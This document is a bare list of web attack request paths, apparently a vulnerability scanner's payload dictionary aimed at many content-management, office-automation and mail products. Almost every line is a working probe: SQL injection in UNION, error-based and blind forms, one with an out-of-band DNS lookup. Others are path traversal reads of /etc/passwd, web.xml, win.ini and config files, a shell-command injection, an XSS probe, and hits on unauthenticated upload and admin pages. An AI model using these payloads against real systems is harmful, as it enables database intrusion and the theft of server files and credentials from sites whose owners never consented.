/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/poweb/CDHelp.jsp?ISOID=3'%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,char%28104%29%2bchar%28107%29%2bchar%2858%29%2bchar%2849%29%2bchar%2858%29%2bchar%2849%29%2bchar%2857%29%2bchar%2857%29%2bchar%2855%29,null,null,null%20%20--%20
/information/OA_InforList.asp
/information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20--
/information_manager/informationmanager_upload.jsp?upload=1&dispControl=null&saveControl=null
/public/jsp/multiuploadfile.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&photos=null
/public/jsp/smartUploadPic.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jspx,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0
/jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all
/jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/MailExportDo.asp?dellist=-1234%29%20or%203438%3DCONVERT%28INT%2C%28SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2b%28SELECT%20%28CASE%20WHEN%20%288986%3D8986%29%20THEN%20CHAR%28105%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%29%29%20%20AND%20%281602%3D1602
/mailClassInfor.asp
/MessageInfoDis.asp?VOID=26%20and%201122%3DCONVERT%28INT%2C%28SELECT%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%29%29%20--
/Include/DepartmentSet_Right.aspx?BI_ID=1'%20and%20(select%2b(char(106)%2bchar(120)%2bchar(106)%2bchar(120)))%3E0--
/jcms/m_1_9/user/down.jsp?pathfile=../jcms/m_1_9/user/down.jsp
/tophp.asp
/Manage/CalendarMemo/event.ashx
/RuvarHRM/web_common/file_download.aspx?hr_file_storage_id=1')%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/bbsSet/BoardInfo.aspx?board_id=-1'%20and%20(select%20char(106)%2bchar(106))%3E0--&level=1
/SysManage/include/SelectUnderling.aspx?u_underling=(select%20char(106)%2bchar(106)))--'
/SysManage/MailSet/select_mail.aspx?corp_id=(select%20char(106)%2bchar(106))%20--
/workflow/OfficeFileDownload.aspx?filename=1'%20and%20(select%20char(106)%2bchar(106))%3E0%20--
/SysManage/get_department.aspx?corpID=char(106)%2bchar(106)
/SysManage/role_setting_new.aspx?id=char(106)%2bchar(106)
/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=%CF%C3%C3%C5%B4%F3%D1%A7&subject1=0&subject2=0&name=%25%27%20AND%201122%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%28104%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281122%3D1122%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2849%29%7C%7CCHR%2857%29%7C%7CCHR%2857%29%7C%7CCHR%2855%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27
/oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
/SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
/lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
/kaoqin/JiaoYanDis.asp
/admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
/tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
/filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
/OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
/Manage/CalendarMemo/load.ashx
/php/report/include/ldap.inc
/php/report/include/util.inc
/php/report/include/config.inc
/php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/user/storage_explore.php
/grad/admin/domain_logo.php
/user/storage_fold_explore.php
/php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
/user/send_queue/upload_addition.php
/php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
/php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
/grad/admin/admin_logo_upload.php
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/download.ashx?files=../web.config
/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
/Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
/jis/manage/databak/showlog.jsp?path=../showlog.jsp
/download.jsp?path=UserFiles/../download.jsp
/tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
/zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
/jis/interface/offer.jsp?flag=user
/jis/down.jsp?pathfile=./down.jsp%00.jpg
/MockLogin.aspx
/mobile/user.php?act=order_list
/seeyon/management/status.jsp
/api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
/monitoring?part=web.xml
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/download.action?fullPath=./WEB-INF/web.xml
/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
/jis/update/update.jsp?fn_billstatus=U
/install/install.php
/public/minify.php?f=../ooxxooxxo/hehe.js
/admin/index.asp
/plus/outside.php?id=../template/default/style/yun_index.css%00
/productpic.aspx?id=100611)%20and%201=char(106)%20--
/jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
/jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
/jcms/m_5_5/m_5_5_3/import.jsp
/upload!uploadImg.action
/AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
/?do=index&mod=goods
/index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
/MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
/RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
/Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
/news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
/news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
/admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
/admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
/admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
/webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
/plugins/phpdisk_client/client_sub.php?action=upload_file
/ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
/SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/Web/Login.aspx
/Web/KeySearch.aspx?searchid=1234
/portal/admin/setright.aspx?id=-1
/infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
/prog/filedown.php?pe_id=MQ==
/emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
/emlib4/format/release/aspx/eml_userwh.aspx
/voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
/kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
/getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
/letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
/OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
/Tools/stream/FlvStream.ashx?file=./Index.aspx
/tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
/webConfigSet/configSetting.aspx?url=/login/index.aspx
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/mydocument/download.aspx
/prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
/module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
/FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
/FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
/goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
/pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
/jis/front/sdgs/updateuser.jsp
/lm/down.jsp?pathfile=down.jsp
/website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
/Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
/meetingroom/MeetingRoom_UseInfo.asp
/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
/downloadFile.action?path=index.jsp
/portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
/lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
/php/bill/print_addfeelog.php
/objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
/meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
/information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
/information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
/message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
/house/upload/upload.asp
/sbweb/Upload_Save_2.asp
/feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
/jsearch/admin/opr_forcechangepwd.jsp
/home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
